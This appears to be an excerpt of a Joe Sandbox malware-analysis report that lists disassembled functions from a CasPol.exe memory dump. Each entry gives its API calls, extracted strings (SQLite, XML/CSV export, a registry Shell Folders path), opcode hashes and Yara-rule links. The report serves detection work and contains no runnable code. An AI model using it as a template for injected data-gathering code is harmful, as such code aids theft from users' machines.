                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                                                                                    • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                    • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                    Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                    • memset.MSVCRT ref: 00405455
                                                                                                                                                                                    • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                    • memset.MSVCRT ref: 00405483
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                    • String ID: 6$\
                                                                                                                                                                                    • API String ID: 404372293-1284684873
                                                                                                                                                                                    • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                    • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                    Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1331804452-0
                                                                                                                                                                                    • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                    Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <%s>, xrefs: 004100A6
                                                                                                                                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                                                                                                    • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                    Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                                                                                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                    Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                                                                                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                    Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                    • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2350177629-0
                                                                                                                                                                                    • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                    • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                    Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                    • API String ID: 2221118986-1606337402
                                                                                                                                                                                    • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                    • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                    Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408FB3
                                                                                                                                                                                    • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00409025
                                                                                                                                                                                    • memset.MSVCRT ref: 00409042
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                      • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 265355444-0
                                                                                                                                                                                    • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                    • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                    Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4131475296-0
                                                                                                                                                                                    • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                    Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                    • API String ID: 2618321458-3614832568
                                                                                                                                                                                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                    Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFilefreememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2507021081-0
                                                                                                                                                                                    • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                    • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                    Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                    • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                    • free.MSVCRT ref: 00417544
                                                                                                                                                                                    • free.MSVCRT ref: 00417562
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4131324427-0
                                                                                                                                                                                    • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                    Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                                    • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                                    • free.MSVCRT ref: 0041822B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PathTemp$free
                                                                                                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                    • API String ID: 924794160-1420421710
                                                                                                                                                                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                    Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                                                                                                    • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                    Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004147C1
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                    • String ID: General
                                                                                                                                                                                    • API String ID: 999786162-26480598
                                                                                                                                                                                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                    Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                                                                                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                    Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                    • API String ID: 0-1953309616
                                                                                                                                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
